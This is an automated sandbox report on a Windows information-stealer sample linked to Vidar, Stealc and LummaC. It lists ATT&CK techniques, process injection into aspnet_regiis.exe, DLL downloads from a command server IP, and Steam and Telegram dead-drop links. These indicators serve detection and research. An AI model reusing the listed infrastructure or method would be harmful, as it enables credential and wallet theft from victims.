                      Source: Yara match File source: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: aspnet_regiis.exe PID: 1420, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6CC50C40 sqlite3_bind_zeroblob,3_2_6CC50C40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6CC50D60 sqlite3_bind_parameter_name,3_2_6CC50D60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6CB78EA0 sqlite3_clear_bindings,3_2_6CB78EA0
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 511 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Credentials in Registry | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 4 Obfuscated Files or Information | Security Account Manager | 4 File and Directory Discovery | SMB/Windows Admin Shares | 1 Screen Capture | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Software Packing | NTDS | 54 System Information Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 151 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 31 Virtualization/Sandbox Evasion | DCSync | 12 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 511 Process Injection | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
Behavior Graph (ID: 1524654; Sample: file.exe; Startdate: 03/10/2024; Architecture: WINDOWS; Score: 100)

• Graph-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures
• file.exe (started): dropped C:\Users\user\AppData\Roaming\msvcp110.dll (PE32) and C:\Users\user\AppData\Local\...\file.exe.log (ASCII); started aspnet_regiis.exe and conhost.exe. Signatures: Detected unpacking (changes PE section rights); Contains functionality to inject code into remote processes; Writes to foreign memory regions; 2 other signatures
• aspnet_regiis.exe (started): DNS/IP nodes 49.12.197.9, 443, 49712, 49713 (HETZNER-ASDE, Germany); steamcommunity.com 104.102.49.254, 443, 49711 (AKAMAI-ASUS, United States); 147.45.44.104, 49735, 80 (FREE-NET-ASFREEnetEU, Russian Federation). Dropped C:\ProgramData\softokn3.dll, C:\ProgramData\nss3.dll, C:\ProgramData\mozglue.dll (PE32) and 3 other files (1 malicious). Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Found many strings related to Crypto-Wallets (likely being stolen); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); 5 other signatures

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| file.exe | 30% | Virustotal | | Browse |
| file.exe | 100% | Joe Sandbox ML | | |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\user\AppData\Roaming\msvcp110.dll | 100% | Joe Sandbox ML | | |
| C:\ProgramData\freebl3.dll | 0% | ReversingLabs | | |
| C:\ProgramData\mozglue.dll | 0% | ReversingLabs | | |
| C:\ProgramData\msvcp140.dll | 0% | ReversingLabs | | |
| C:\ProgramData\nss3.dll | 0% | ReversingLabs | | |
| C:\ProgramData\softokn3.dll | 0% | ReversingLabs | | |
| C:\ProgramData\vcruntime140.dll | 0% | ReversingLabs | | |

No Antivirus matches

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| steamcommunity.com | 0% | Virustotal | | Browse |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| steamcommunity.com | 104.102.49.254 | true | true | | unknown |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://49.12.197.9/ | true | | unknown |
| https://49.12.197.9/freebl3.dll | true | | unknown |
| https://49.12.197.9/sqlp.dll | true | | unknown |
| https://49.12.197.9/softokn3.dll | true | | unknown |
| https://49.12.197.9/vcruntime140.dll | true | | unknown |
| https://49.12.197.9/nss3.dll | true | | unknown |
| https://49.12.197.9/mozglue.dll | true | | unknown |
                                                                            https://s.ytimg.com;aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://49.12.197.9/0aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://49.12.197.9/12.197.9/aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1937588640.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1903702443.0000000002DED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://steam.tv/aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://49.12.197.9/5aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1937588640.0000000002DED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://t.me/ae5edfile.exe, 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      http://www.mozilla.com/en-US/blocklist/aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2680382031.000000006CADD000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.drfalse
                                                                                        unknown
                                                                                        https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishaspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://mozilla.org0/aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1857214387.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://steamcommunity.com/saspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://49.12.197.9CBAAECaspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fWwPaspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                              unknown
                                                                                              http://store.steampowered.com/privacy_agreement/aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://store.steampowered.com/points/shop/aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.drfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sfile.exefalse
                                                                                                unknown
                                                                                                https://sketchfab.comaspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://www.ecosia.org/newtab/aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://lv.queniujq.cnaspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brHDGCFH.3.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://www.youtube.com/aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&aaspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                                      unknown
                                                                                                      https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199780418869[1].htm.3.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, DBFIEH.3.drfalse
                                                                                                        unknown
                                                                                                        https://store.steampowered.com/privacy_agreement/aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enaspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                                          unknown
                                                                                                          https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amaspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://www.google.com/recaptcha/aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://49.12.197.9/mozglue.dll(aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://checkout.steampowered.com/aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishaspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishaspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgaspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, DBFIEH.3.drfalse
                                                                                                                unknown
                                                                                                                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiDBFIEH.3.drfalse
                                                                                                                  unknown
                                                                                                                  https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngaspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  https://steamcommunity.com/profiles/76561199780418869xaspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    unknown
IP | Domain | Country | ASN | ASN Name | Malicious
49.12.197.9 | unknown | Germany | 24940 | HETZNER-ASDE | true
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | true
147.45.44.104 | unknown | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1524654
Start date and time: 2024-10-03 03:25:13 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 28s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@5/26@1/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 96
• Number of non-executed functions: 180
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
21:26:50 | API Interceptor | 1x Sleep call for process: aspnet_regiis.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
49.12.197.9 | 66fb252fe232b_Patksl.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar |
49.12.197.9 | file.exe | malicious | LummaC, Stealc, Vidar |
49.12.197.9 | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar |
49.12.197.9 | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar |
49.12.197.9 | file.exe | malicious | LummaC, Stealc, Vidar |
49.12.197.9 | file.exe | malicious | LummaC, Stealc, Vidar |
49.12.197.9 | file.exe | malicious | LummaC, Stealc, Vidar |
49.12.197.9 | file.exe | malicious | LummaC, Stealc, Vidar |
49.12.197.9 | 6JA2YPtbeB.exe | malicious | LummaC, Stealc, Vidar |
49.12.197.9 | hTR7xY0d0V.exe | malicious | LummaC, Stealc, Vidar |
104.102.49.254 | http://gtm-cn-j4g3qqvf603.steamproxy1.com/ | malicious | Unknown | www.valvesoftware.com/legal.htm
